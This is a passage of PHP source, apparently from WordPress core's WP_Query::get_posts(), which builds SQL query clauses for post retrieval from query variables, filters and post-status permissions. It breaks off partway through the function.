public function set( $query_var, $value ) {
$this->query_vars[ $query_var ] = $value;
}
/**
* Retrieves an array of posts based on query variables.
*
* There are a few filters and actions that can be used to modify the post
* database query.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return WP_Post[]|int[] Array of post objects or post IDs.
*/
public function get_posts() {
global $wpdb;
$this->parse_query();
/**
* Fires after the query variable object is created, but before the actual query is run.
*
* Note: If using conditional tags, use the method versions within the passed instance
* (e.g. $this->is_main_query() instead of is_main_query()). This is because the functions
* like is_main_query() test against the global $wp_query instance, not the passed one.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'pre_get_posts', array( &$this ) );
// Locally scoped reference for easy of use.
$query_vars = &$this->query_vars;
// Fill again in case 'pre_get_posts' unset some vars.
$query_vars = $this->fill_query_vars( $query_vars );
/**
* Filters whether an attachment query should include filenames or not.
*
* @since 6.0.3
*
* @param bool $allow_query_attachment_by_filename Whether or not to include filenames.
*/
$this->allow_query_attachment_by_filename = apply_filters( 'wp_allow_query_attachment_by_filename', false );
remove_all_filters( 'wp_allow_query_attachment_by_filename' );
// Parse meta query.
$this->meta_query = new WP_Meta_Query();
$this->meta_query->parse_query_vars( $query_vars );
// Set a flag if a 'pre_get_posts' hook changed the query vars.
$hash = md5( serialize( $this->query_vars ) );
if ( $hash !== $this->query_vars_hash ) {
$this->query_vars_changed = true;
$this->query_vars_hash = $hash;
}
unset( $hash );
// First let's clear some variables.
$distinct = '';
$whichauthor = '';
$whichmimetype = '';
$where = '';
$limits = '';
$join = '';
$search = '';
$groupby = '';
$post_status_join = false;
$page = 1;
if ( isset( $query_vars['caller_get_posts'] ) ) {
_deprecated_argument(
'WP_Query',
'3.1.0',
sprintf(
/* translators: 1: caller_get_posts, 2: ignore_sticky_posts */
__( '%1$s is deprecated. Use %2$s instead.' ),
'<code>caller_get_posts</code>',
'<code>ignore_sticky_posts</code>'
)
);
if ( ! isset( $query_vars['ignore_sticky_posts'] ) ) {
$query_vars['ignore_sticky_posts'] = $query_vars['caller_get_posts'];
}
}
if ( ! isset( $query_vars['ignore_sticky_posts'] ) ) {
$query_vars['ignore_sticky_posts'] = false;
}
if ( ! isset( $query_vars['suppress_filters'] ) ) {
$query_vars['suppress_filters'] = false;
}
if ( ! isset( $query_vars['cache_results'] ) ) {
$query_vars['cache_results'] = true;
}
if ( ! isset( $query_vars['update_post_term_cache'] ) ) {
$query_vars['update_post_term_cache'] = true;
}
if ( ! isset( $query_vars['update_menu_item_cache'] ) ) {
$query_vars['update_menu_item_cache'] = false;
}
if ( ! isset( $query_vars['lazy_load_term_meta'] ) ) {
$query_vars['lazy_load_term_meta'] = $query_vars['update_post_term_cache'];
} elseif ( $query_vars['lazy_load_term_meta'] ) { // Lazy loading term meta only works if term caches are primed.
$query_vars['update_post_term_cache'] = true;
}
if ( ! isset( $query_vars['update_post_meta_cache'] ) ) {
$query_vars['update_post_meta_cache'] = true;
}
if ( ! isset( $query_vars['post_type'] ) ) {
if ( $this->is_search ) {
$query_vars['post_type'] = 'any';
} else {
$query_vars['post_type'] = '';
}
}
$post_type = $query_vars['post_type'];
if ( empty( $query_vars['posts_per_page'] ) ) {
$query_vars['posts_per_page'] = get_option( 'posts_per_page' );
}
if ( isset( $query_vars['showposts'] ) && $query_vars['showposts'] ) {
$query_vars['showposts'] = (int) $query_vars['showposts'];
$query_vars['posts_per_page'] = $query_vars['showposts'];
}
if ( ( isset( $query_vars['posts_per_archive_page'] ) && 0 != $query_vars['posts_per_archive_page'] ) && ( $this->is_archive || $this->is_search ) ) {
$query_vars['posts_per_page'] = $query_vars['posts_per_archive_page'];
}
if ( ! isset( $query_vars['nopaging'] ) ) {
if ( -1 == $query_vars['posts_per_page'] ) {
$query_vars['nopaging'] = true;
} else {
$query_vars['nopaging'] = false;
}
}
if ( $this->is_feed ) {
// This overrides 'posts_per_page'.
if ( ! empty( $query_vars['posts_per_rss'] ) ) {
$query_vars['posts_per_page'] = $query_vars['posts_per_rss'];
} else {
$query_vars['posts_per_page'] = get_option( 'posts_per_rss' );
}
$query_vars['nopaging'] = false;
}
$query_vars['posts_per_page'] = (int) $query_vars['posts_per_page'];
if ( $query_vars['posts_per_page'] < -1 ) {
$query_vars['posts_per_page'] = abs( $query_vars['posts_per_page'] );
} elseif ( 0 === $query_vars['posts_per_page'] ) {
$query_vars['posts_per_page'] = 1;
}
if ( ! isset( $query_vars['comments_per_page'] ) || 0 == $query_vars['comments_per_page'] ) {
$query_vars['comments_per_page'] = get_option( 'comments_per_page' );
}
if ( $this->is_home && ( empty( $this->query ) || 'true' === $query_vars['preview'] ) && ( 'page' === get_option( 'show_on_front' ) ) && get_option( 'page_on_front' ) ) {
$this->is_page = true;
$this->is_home = false;
$query_vars['page_id'] = get_option( 'page_on_front' );
}
if ( isset( $query_vars['page'] ) ) {
$query_vars['page'] = is_scalar( $query_vars['page'] ) ? absint( trim( $query_vars['page'], '/' ) ) : 0;
}
// If true, forcibly turns off SQL_CALC_FOUND_ROWS even when limits are present.
if ( isset( $query_vars['no_found_rows'] ) ) {
$query_vars['no_found_rows'] = (bool) $query_vars['no_found_rows'];
} else {
$query_vars['no_found_rows'] = false;
}
switch ( $query_vars['fields'] ) {
case 'ids':
$fields = "{$wpdb->posts}.ID";
break;
case 'id=>parent':
$fields = "{$wpdb->posts}.ID, {$wpdb->posts}.post_parent";
break;
case '':
/*
* Set the default to 'all'.
*
* This is used in `WP_Query::the_post` to determine if the
* entire post object has been queried.
*/
$query_vars['fields'] = 'all';
// Falls through.
default:
$fields = "{$wpdb->posts}.*";
}
if ( '' !== $query_vars['menu_order'] ) {
$where .= " AND {$wpdb->posts}.menu_order = " . $query_vars['menu_order'];
}
// The "m" parameter is meant for months but accepts datetimes of varying specificity.
if ( $query_vars['m'] ) {
$where .= " AND YEAR({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 0, 4 );
if ( strlen( $query_vars['m'] ) > 5 ) {
$where .= " AND MONTH({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 4, 2 );
}
if ( strlen( $query_vars['m'] ) > 7 ) {
$where .= " AND DAYOFMONTH({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 6, 2 );
}
if ( strlen( $query_vars['m'] ) > 9 ) {
$where .= " AND HOUR({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 8, 2 );
}
if ( strlen( $query_vars['m'] ) > 11 ) {
$where .= " AND MINUTE({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 10, 2 );
}
if ( strlen( $query_vars['m'] ) > 13 ) {
$where .= " AND SECOND({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 12, 2 );
}
}
// Handle the other individual date parameters.
$date_parameters = array();
if ( '' !== $query_vars['hour'] ) {
$date_parameters['hour'] = $query_vars['hour'];
}
if ( '' !== $query_vars['minute'] ) {
$date_parameters['minute'] = $query_vars['minute'];
}
if ( '' !== $query_vars['second'] ) {
$date_parameters['second'] = $query_vars['second'];
}
if ( $query_vars['year'] ) {
$date_parameters['year'] = $query_vars['year'];
}
if ( $query_vars['monthnum'] ) {
$date_parameters['monthnum'] = $query_vars['monthnum'];
}
if ( $query_vars['w'] ) {
$date_parameters['week'] = $query_vars['w'];
}
if ( $query_vars['day'] ) {
$date_parameters['day'] = $query_vars['day'];
}
if ( $date_parameters ) {
$date_query = new WP_Date_Query( array( $date_parameters ) );
$where .= $date_query->get_sql();
}
unset( $date_parameters, $date_query );
// Handle complex date queries.
if ( ! empty( $query_vars['date_query'] ) ) {
$this->date_query = new WP_Date_Query( $query_vars['date_query'] );
$where .= $this->date_query->get_sql();
}
// If we've got a post_type AND it's not "any" post_type.
if ( ! empty( $query_vars['post_type'] ) && 'any' !== $query_vars['post_type'] ) {
foreach ( (array) $query_vars['post_type'] as $_post_type ) {
$ptype_obj = get_post_type_object( $_post_type );
if ( ! $ptype_obj || ! $ptype_obj->query_var || empty( $query_vars[ $ptype_obj->query_var ] ) ) {
continue;
}
if ( ! $ptype_obj->hierarchical ) {
// Non-hierarchical post types can directly use 'name'.
$query_vars['name'] = $query_vars[ $ptype_obj->query_var ];
} else {
// Hierarchical post types will operate through 'pagename'.
$query_vars['pagename'] = $query_vars[ $ptype_obj->query_var ];
$query_vars['name'] = '';
}
// Only one request for a slug is possible, this is why name & pagename are overwritten above.
break;
} // End foreach.
unset( $ptype_obj );
}
if ( '' !== $query_vars['title'] ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_title = %s", stripslashes( $query_vars['title'] ) );
}
// Parameters related to 'post_name'.
if ( '' !== $query_vars['name'] ) {
$query_vars['name'] = sanitize_title_for_query( $query_vars['name'] );
$where .= " AND {$wpdb->posts}.post_name = '" . $query_vars['name'] . "'";
} elseif ( '' !== $query_vars['pagename'] ) {
if ( isset( $this->queried_object_id ) ) {
$reqpage = $this->queried_object_id;
} else {
if ( 'page' !== $query_vars['post_type'] ) {
foreach ( (array) $query_vars['post_type'] as $_post_type ) {
$ptype_obj = get_post_type_object( $_post_type );
if ( ! $ptype_obj || ! $ptype_obj->hierarchical ) {
continue;
}
$reqpage = get_page_by_path( $query_vars['pagename'], OBJECT, $_post_type );
if ( $reqpage ) {
break;
}
}
unset( $ptype_obj );
} else {
$reqpage = get_page_by_path( $query_vars['pagename'] );
}
if ( ! empty( $reqpage ) ) {
$reqpage = $reqpage->ID;
} else {
$reqpage = 0;
}
}
$page_for_posts = get_option( 'page_for_posts' );
if ( ( 'page' !== get_option( 'show_on_front' ) ) || empty( $page_for_posts ) || ( $reqpage != $page_for_posts ) ) {
$query_vars['pagename'] = sanitize_title_for_query( wp_basename( $query_vars['pagename'] ) );
$query_vars['name'] = $query_vars['pagename'];
$where .= " AND ({$wpdb->posts}.ID = '$reqpage')";
$reqpage_obj = get_post( $reqpage );
if ( is_object( $reqpage_obj ) && 'attachment' === $reqpage_obj->post_type ) {
$this->is_attachment = true;
$post_type = 'attachment';
$query_vars['post_type'] = 'attachment';
$this->is_page = true;
$query_vars['attachment_id'] = $reqpage;
}
}
} elseif ( '' !== $query_vars['attachment'] ) {
$query_vars['attachment'] = sanitize_title_for_query( wp_basename( $query_vars['attachment'] ) );
$query_vars['name'] = $query_vars['attachment'];
$where .= " AND {$wpdb->posts}.post_name = '" . $query_vars['attachment'] . "'";
} elseif ( is_array( $query_vars['post_name__in'] ) && ! empty( $query_vars['post_name__in'] ) ) {
$query_vars['post_name__in'] = array_map( 'sanitize_title_for_query', $query_vars['post_name__in'] );
// Duplicate array before sorting to allow for the orderby clause.
$post_name__in_for_where = array_unique( $query_vars['post_name__in'] );
sort( $post_name__in_for_where );
$post_name__in = "'" . implode( "','", $post_name__in_for_where ) . "'";
$where .= " AND {$wpdb->posts}.post_name IN ($post_name__in)";
}
// If an attachment is requested by number, let it supersede any post number.
if ( $query_vars['attachment_id'] ) {
$query_vars['p'] = absint( $query_vars['attachment_id'] );
}
// If a post number is specified, load that post.
if ( $query_vars['p'] ) {
$where .= " AND {$wpdb->posts}.ID = " . $query_vars['p'];
} elseif ( $query_vars['post__in'] ) {
// Duplicate array before sorting to allow for the orderby clause.
$post__in_for_where = $query_vars['post__in'];
$post__in_for_where = array_unique( array_map( 'absint', $post__in_for_where ) );
sort( $post__in_for_where );
$post__in = implode( ',', array_map( 'absint', $post__in_for_where ) );
$where .= " AND {$wpdb->posts}.ID IN ($post__in)";
} elseif ( $query_vars['post__not_in'] ) {
sort( $query_vars['post__not_in'] );
$post__not_in = implode( ',', array_map( 'absint', $query_vars['post__not_in'] ) );
$where .= " AND {$wpdb->posts}.ID NOT IN ($post__not_in)";
}
if ( is_numeric( $query_vars['post_parent'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_parent = %d ", $query_vars['post_parent'] );
} elseif ( $query_vars['post_parent__in'] ) {
// Duplicate array before sorting to allow for the orderby clause.
$post_parent__in_for_where = $query_vars['post_parent__in'];
$post_parent__in_for_where = array_unique( array_map( 'absint', $post_parent__in_for_where ) );
sort( $post_parent__in_for_where );
$post_parent__in = implode( ',', array_map( 'absint', $post_parent__in_for_where ) );
$where .= " AND {$wpdb->posts}.post_parent IN ($post_parent__in)";
} elseif ( $query_vars['post_parent__not_in'] ) {
sort( $query_vars['post_parent__not_in'] );
$post_parent__not_in = implode( ',', array_map( 'absint', $query_vars['post_parent__not_in'] ) );
$where .= " AND {$wpdb->posts}.post_parent NOT IN ($post_parent__not_in)";
}
if ( $query_vars['page_id'] ) {
if ( ( 'page' !== get_option( 'show_on_front' ) ) || ( get_option( 'page_for_posts' ) != $query_vars['page_id'] ) ) {
$query_vars['p'] = $query_vars['page_id'];
$where = " AND {$wpdb->posts}.ID = " . $query_vars['page_id'];
}
}
// If a search pattern is specified, load the posts that match.
if ( strlen( $query_vars['s'] ) ) {
$search = $this->parse_search( $query_vars );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the search SQL that is used in the WHERE clause of WP_Query.
*
* @since 3.0.0
*
* @param string $search Search SQL for WHERE clause.
* @param WP_Query $query The current WP_Query object.
*/
$search = apply_filters_ref_array( 'posts_search', array( $search, &$this ) );
}
// Taxonomies.
if ( ! $this->is_singular ) {
$this->parse_tax_query( $query_vars );
$clauses = $this->tax_query->get_sql( $wpdb->posts, 'ID' );
$join .= $clauses['join'];
$where .= $clauses['where'];
}
if ( $this->is_tax ) {
if ( empty( $post_type ) ) {
// Do a fully inclusive search for currently registered post types of queried taxonomies.
$post_type = array();
$taxonomies = array_keys( $this->tax_query->queried_terms );
foreach ( get_post_types( array( 'exclude_from_search' => false ) ) as $pt ) {
$object_taxonomies = 'attachment' === $pt ? get_taxonomies_for_attachments() : get_object_taxonomies( $pt );
if ( array_intersect( $taxonomies, $object_taxonomies ) ) {
$post_type[] = $pt;
}
}
if ( ! $post_type ) {
$post_type = 'any';
} elseif ( count( $post_type ) === 1 ) {
$post_type = $post_type[0];
} else {
// Sort post types to ensure same cache key generation.
sort( $post_type );
}
$post_status_join = true;
} elseif ( in_array( 'attachment', (array) $post_type, true ) ) {
$post_status_join = true;
}
}
/*
* Ensure that 'taxonomy', 'term', 'term_id', 'cat', and
* 'category_name' vars are set for backward compatibility.
*/
if ( ! empty( $this->tax_query->queried_terms ) ) {
/*
* Set 'taxonomy', 'term', and 'term_id' to the
* first taxonomy other than 'post_tag' or 'category'.
*/
if ( ! isset( $query_vars['taxonomy'] ) ) {
foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) {
if ( empty( $queried_items['terms'][0] ) ) {
continue;
}
if ( ! in_array( $queried_taxonomy, array( 'category', 'post_tag' ), true ) ) {
$query_vars['taxonomy'] = $queried_taxonomy;
if ( 'slug' === $queried_items['field'] ) {
$query_vars['term'] = $queried_items['terms'][0];
} else {
$query_vars['term_id'] = $queried_items['terms'][0];
}
// Take the first one we find.
break;
}
}
}
// 'cat', 'category_name', 'tag_id'.
foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) {
if ( empty( $queried_items['terms'][0] ) ) {
continue;
}
if ( 'category' === $queried_taxonomy ) {
$the_cat = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'category' );
if ( $the_cat ) {
$this->set( 'cat', $the_cat->term_id );
$this->set( 'category_name', $the_cat->slug );
}
unset( $the_cat );
}
if ( 'post_tag' === $queried_taxonomy ) {
$the_tag = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'post_tag' );
if ( $the_tag ) {
$this->set( 'tag_id', $the_tag->term_id );
}
unset( $the_tag );
}
}
}
if ( ! empty( $this->tax_query->queries ) || ! empty( $this->meta_query->queries ) || ! empty( $this->allow_query_attachment_by_filename ) ) {
$groupby = "{$wpdb->posts}.ID";
}
// Author/user stuff.
if ( ! empty( $query_vars['author'] ) && '0' != $query_vars['author'] ) {
$query_vars['author'] = addslashes_gpc( '' . urldecode( $query_vars['author'] ) );
$authors = array_unique( array_map( 'intval', preg_split( '/[,\s]+/', $query_vars['author'] ) ) );
sort( $authors );
foreach ( $authors as $author ) {
$key = $author > 0 ? 'author__in' : 'author__not_in';
$query_vars[ $key ][] = abs( $author );
}
$query_vars['author'] = implode( ',', $authors );
}
if ( ! empty( $query_vars['author__not_in'] ) ) {
if ( is_array( $query_vars['author__not_in'] ) ) {
$query_vars['author__not_in'] = array_unique( array_map( 'absint', $query_vars['author__not_in'] ) );
sort( $query_vars['author__not_in'] );
}
$author__not_in = implode( ',', (array) $query_vars['author__not_in'] );
$where .= " AND {$wpdb->posts}.post_author NOT IN ($author__not_in) ";
} elseif ( ! empty( $query_vars['author__in'] ) ) {
if ( is_array( $query_vars['author__in'] ) ) {
$query_vars['author__in'] = array_unique( array_map( 'absint', $query_vars['author__in'] ) );
sort( $query_vars['author__in'] );
}
$author__in = implode( ',', array_map( 'absint', array_unique( (array) $query_vars['author__in'] ) ) );
$where .= " AND {$wpdb->posts}.post_author IN ($author__in) ";
}
// Author stuff for nice URLs.
if ( '' !== $query_vars['author_name'] ) {
if ( str_contains( $query_vars['author_name'], '/' ) ) {
$query_vars['author_name'] = explode( '/', $query_vars['author_name'] );
if ( $query_vars['author_name'][ count( $query_vars['author_name'] ) - 1 ] ) {
$query_vars['author_name'] = $query_vars['author_name'][ count( $query_vars['author_name'] ) - 1 ]; // No trailing slash.
} else {
$query_vars['author_name'] = $query_vars['author_name'][ count( $query_vars['author_name'] ) - 2 ]; // There was a trailing slash.
}
}
$query_vars['author_name'] = sanitize_title_for_query( $query_vars['author_name'] );
$query_vars['author'] = get_user_by( 'slug', $query_vars['author_name'] );
if ( $query_vars['author'] ) {
$query_vars['author'] = $query_vars['author']->ID;
}
$whichauthor .= " AND ({$wpdb->posts}.post_author = " . absint( $query_vars['author'] ) . ')';
}
// Matching by comment count.
if ( isset( $query_vars['comment_count'] ) ) {
// Numeric comment count is converted to array format.
if ( is_numeric( $query_vars['comment_count'] ) ) {
$query_vars['comment_count'] = array(
'value' => (int) $query_vars['comment_count'],
);
}
if ( isset( $query_vars['comment_count']['value'] ) ) {
$query_vars['comment_count'] = array_merge(
array(
'compare' => '=',
),
$query_vars['comment_count']
);
// Fallback for invalid compare operators is '='.
$compare_operators = array( '=', '!=', '>', '>=', '<', '<=' );
if ( ! in_array( $query_vars['comment_count']['compare'], $compare_operators, true ) ) {
$query_vars['comment_count']['compare'] = '=';
}
$where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_count {$query_vars['comment_count']['compare']} %d", $query_vars['comment_count']['value'] );
}
}
// MIME-Type stuff for attachment browsing.
if ( isset( $query_vars['post_mime_type'] ) && '' !== $query_vars['post_mime_type'] ) {
$whichmimetype = wp_post_mime_type_where( $query_vars['post_mime_type'], $wpdb->posts );
}
$where .= $search . $whichauthor . $whichmimetype;
if ( ! empty( $this->allow_query_attachment_by_filename ) ) {
$join .= " LEFT JOIN {$wpdb->postmeta} AS sq1 ON ( {$wpdb->posts}.ID = sq1.post_id AND sq1.meta_key = '_wp_attached_file' )";
}
if ( ! empty( $this->meta_query->queries ) ) {
$clauses = $this->meta_query->get_sql( 'post', $wpdb->posts, 'ID', $this );
$join .= $clauses['join'];
$where .= $clauses['where'];
}
$rand = ( isset( $query_vars['orderby'] ) && 'rand' === $query_vars['orderby'] );
if ( ! isset( $query_vars['order'] ) ) {
$query_vars['order'] = $rand ? '' : 'DESC';
} else {
$query_vars['order'] = $rand ? '' : $this->parse_order( $query_vars['order'] );
}
// These values of orderby should ignore the 'order' parameter.
$force_asc = array( 'post__in', 'post_name__in', 'post_parent__in' );
if ( isset( $query_vars['orderby'] ) && in_array( $query_vars['orderby'], $force_asc, true ) ) {
$query_vars['order'] = '';
}
// Order by.
if ( empty( $query_vars['orderby'] ) ) {
/*
* Boolean false or empty array blanks out ORDER BY,
* while leaving the value unset or otherwise empty sets the default.
*/
if ( isset( $query_vars['orderby'] ) && ( is_array( $query_vars['orderby'] ) || false === $query_vars['orderby'] ) ) {
$orderby = '';
} else {
$orderby = "{$wpdb->posts}.post_date " . $query_vars['order'];
}
} elseif ( 'none' === $query_vars['orderby'] ) {
$orderby = '';
} else {
$orderby_array = array();
if ( is_array( $query_vars['orderby'] ) ) {
foreach ( $query_vars['orderby'] as $_orderby => $order ) {
$orderby = addslashes_gpc( urldecode( $_orderby ) );
$parsed = $this->parse_orderby( $orderby );
if ( ! $parsed ) {
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $order );
}
$orderby = implode( ', ', $orderby_array );
} else {
$query_vars['orderby'] = urldecode( $query_vars['orderby'] );
$query_vars['orderby'] = addslashes_gpc( $query_vars['orderby'] );
foreach ( explode( ' ', $query_vars['orderby'] ) as $i => $orderby ) {
$parsed = $this->parse_orderby( $orderby );
// Only allow certain values for safety.
if ( ! $parsed ) {
continue;
}
$orderby_array[] = $parsed;
}
$orderby = implode( ' ' . $query_vars['order'] . ', ', $orderby_array );
if ( empty( $orderby ) ) {
$orderby = "{$wpdb->posts}.post_date " . $query_vars['order'];
} elseif ( ! empty( $query_vars['order'] ) ) {
$orderby .= " {$query_vars['order']}";
}
}
}
// Order search results by relevance only when another "orderby" is not specified in the query.
if ( ! empty( $query_vars['s'] ) ) {
$search_orderby = '';
if ( ! empty( $query_vars['search_orderby_title'] ) && ( empty( $query_vars['orderby'] ) && ! $this->is_feed ) || ( isset( $query_vars['orderby'] ) && 'relevance' === $query_vars['orderby'] ) ) {
$search_orderby = $this->parse_search_order( $query_vars );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the ORDER BY used when ordering search results.
*
* @since 3.7.0
*
* @param string $search_orderby The ORDER BY clause.
* @param WP_Query $query The current WP_Query instance.
*/
$search_orderby = apply_filters( 'posts_search_orderby', $search_orderby, $this );
}
if ( $search_orderby ) {
$orderby = $orderby ? $search_orderby . ', ' . $orderby : $search_orderby;
}
}
if ( is_array( $post_type ) && count( $post_type ) > 1 ) {
$post_type_cap = 'multiple_post_type';
} else {
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$post_type_object = get_post_type_object( $post_type );
if ( empty( $post_type_object ) ) {
$post_type_cap = $post_type;
}
}
if ( isset( $query_vars['post_password'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_password = %s", $query_vars['post_password'] );
if ( empty( $query_vars['perm'] ) ) {
$query_vars['perm'] = 'readable';
}
} elseif ( isset( $query_vars['has_password'] ) ) {
$where .= sprintf( " AND {$wpdb->posts}.post_password %s ''", $query_vars['has_password'] ? '!=' : '=' );
}
if ( ! empty( $query_vars['comment_status'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.comment_status = %s ", $query_vars['comment_status'] );
}
if ( ! empty( $query_vars['ping_status'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.ping_status = %s ", $query_vars['ping_status'] );
}
$skip_post_status = false;
if ( 'any' === $post_type ) {
$in_search_post_types = get_post_types( array( 'exclude_from_search' => false ) );
if ( empty( $in_search_post_types ) ) {
$post_type_where = ' AND 1=0 ';
$skip_post_status = true;
} else {
$post_type_where = " AND {$wpdb->posts}.post_type IN ('" . implode( "', '", array_map( 'esc_sql', $in_search_post_types ) ) . "')";
}
} elseif ( ! empty( $post_type ) && is_array( $post_type ) ) {
// Sort post types to ensure same cache key generation.
sort( $post_type );
$post_type_where = " AND {$wpdb->posts}.post_type IN ('" . implode( "', '", esc_sql( $post_type ) ) . "')";
} elseif ( ! empty( $post_type ) ) {
$post_type_where = $wpdb->prepare( " AND {$wpdb->posts}.post_type = %s", $post_type );
$post_type_object = get_post_type_object( $post_type );
} elseif ( $this->is_attachment ) {
$post_type_where = " AND {$wpdb->posts}.post_type = 'attachment'";
$post_type_object = get_post_type_object( 'attachment' );
} elseif ( $this->is_page ) {
$post_type_where = " AND {$wpdb->posts}.post_type = 'page'";
$post_type_object = get_post_type_object( 'page' );
} else {
$post_type_where = " AND {$wpdb->posts}.post_type = 'post'";
$post_type_object = get_post_type_object( 'post' );
}
$edit_cap = 'edit_post';
$read_cap = 'read_post';
if ( ! empty( $post_type_object ) ) {
$edit_others_cap = $post_type_object->cap->edit_others_posts;
$read_private_cap = $post_type_object->cap->read_private_posts;
} else {
$edit_others_cap = 'edit_others_' . $post_type_cap . 's';
$read_private_cap = 'read_private_' . $post_type_cap . 's';
}
$user_id = get_current_user_id();
$q_status = array();
if ( $skip_post_status ) {
$where .= $post_type_where;
} elseif ( ! empty( $query_vars['post_status'] ) ) {
$where .= $post_type_where;
$statuswheres = array();
$q_status = $query_vars['post_status'];
if ( ! is_array( $q_status ) ) {
$q_status = explode( ',', $q_status );
}
sort( $q_status );
$r_status = array();
$p_status = array();
$e_status = array();
if ( in_array( 'any', $q_status, true ) ) {
foreach ( get_post_stati( array( 'exclude_from_search' => true ) ) as $status ) {
if ( ! in_array( $status, $q_status, true ) ) {
$e_status[] = "{$wpdb->posts}.post_status <> '$status'";
}
}
} else {
foreach ( get_post_stati() as $status ) {
if ( in_array( $status, $q_status, true ) ) {
if ( 'private' === $status ) {
$p_status[] = "{$wpdb->posts}.post_status = '$status'";
} else {
$r_status[] = "{$wpdb->posts}.post_status = '$status'";
}
}
}
}
if ( empty( $query_vars['perm'] ) || 'readable' !== $query_vars['perm'] ) {
$r_status = array_merge( $r_status, $p_status );
unset( $p_status );
}
if ( ! empty( $e_status ) ) {
$statuswheres[] = '(' . implode( ' AND ', $e_status ) . ')';
}
if ( ! empty( $r_status ) ) {
if ( ! empty( $query_vars['perm'] ) && 'editable' === $query_vars['perm'] && ! current_user_can( $edit_others_cap ) ) {
$statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . implode( ' OR ', $r_status ) . '))';
} else {
$statuswheres[] = '(' . implode( ' OR ', $r_status ) . ')';
}
}
if ( ! empty( $p_status ) ) {
if ( ! empty( $query_vars['perm'] ) && 'readable' === $query_vars['perm'] && ! current_user_can( $read_private_cap ) ) {
$statuswheres[] = "({$wpdb->posts}.post_author = $user_id " . 'AND (' . implode( ' OR ', $p_status ) . '))';
} else {
$statuswheres[] = '(' . implode( ' OR ', $p_status ) . ')';
}
}
if ( $post_status_join ) {
$join .= " LEFT JOIN {$wpdb->posts} AS p2 ON ({$wpdb->posts}.post_parent = p2.ID) ";
foreach ( $statuswheres as $index => $statuswhere ) {
$statuswheres[ $index ] = "($statuswhere OR ({$wpdb->posts}.post_status = 'inherit' AND " . str_replace( $wpdb->posts, 'p2', $statuswhere ) . '))';
}
}
$where_status = implode( ' OR ', $statuswheres );
if ( ! empty( $where_status ) ) {
$where .= " AND ($where_status)";
}
} elseif ( ! $this->is_singular ) {
if ( 'any' === $post_type ) {
$queried_post_types = get_post_types( array( 'exclude_from_search' => false ) );
} elseif ( is_array( $post_type ) ) {
$queried_post_types = $post_type;
} elseif ( ! empty( $post_type ) ) {
$queried_post_types = array( $post_type );
} else {
$queried_post_types = array( 'post' );
}
if ( ! empty( $queried_post_types ) ) {
sort( $queried_post_types );
$status_type_clauses = array();
foreach ( $queried_post_types as $queried_post_type ) {
$queried_post_type_object = get_post_type_object( $queried_post_type );
$type_where = '(' . $wpdb->prepare( "{$wpdb->posts}.post_type = %s AND (", $queried_post_type );
// Public statuses.
$public_statuses = get_post_stati( array( 'public' => true ) );
$status_clauses = array();
foreach ( $public_statuses as $public_status ) {
$status_clauses[] = "{$wpdb->posts}.post_status = '$public_status'";
}
$type_where .= implode( ' OR ', $status_clauses );
// Add protected states that should show in the admin all list.
if ( $this->is_admin ) {
$admin_all_statuses = get_post_stati(
array(
'protected' => true,
'show_in_admin_all_list' => true,
)
);
foreach ( $admin_all_statuses as $admin_all_status ) {
$type_where .= " OR {$wpdb->posts}.post_status = '$admin_all_status'";
}
}
// Add private states that are visible to current user.
if ( is_user_logged_in() && $queried_post_type_object instanceof WP_Post_Type ) {
$read_private_cap = $queried_post_type_object->cap->read_private_posts;
$private_statuses = get_post_stati( array( 'private' => true ) );
foreach ( $private_statuses as $private_status ) {
$type_where .= current_user_can( $read_private_cap ) ? " \nOR {$wpdb->posts}.post_status = '$private_status'" : " \nOR ({$wpdb->posts}.post_author = $user_id AND {$wpdb->posts}.post_status = '$private_status')";
}
}
$type_where .= '))';
$status_type_clauses[] = $type_where;
}
if ( ! empty( $status_type_clauses ) ) {
$where .= ' AND (' . implode( ' OR ', $status_type_clauses ) . ')';
}
} else {
$where .= ' AND 1=0 ';
}
} else {
$where .= $post_type_where;
}
/*
* Apply filters on where and join prior to paging so that any
* manipulations to them are reflected in the paging by day queries.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* @since 1.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where', array( $where, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* @since 1.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join', array( $join, &$this ) );
}
// Paging.
if ( empty( $query_vars['nopaging'] ) && ! $this->is_singular ) {
$page = absint( $query_vars['paged'] );
if ( ! $page ) {
$page = 1;
}
// If 'offset' is provided, it takes precedence over 'paged'.
if ( isset( $query_vars['offset'] ) && is_numeric( $query_vars['offset'] ) ) {
$query_vars['offset'] = absint( $query_vars['offset'] );
$pgstrt = $query_vars['offset'] . ', ';
} else {
$pgstrt = absint( ( $page - 1 ) * $query_vars['posts_per_page'] ) . ', ';
}
$limits = 'LIMIT ' . $pgstrt . $query_vars['posts_per_page'];
}
// Comments feeds.
if ( $this->is_comment_feed && ! $this->is_singular ) {
if ( $this->is_archive || $this->is_search ) {
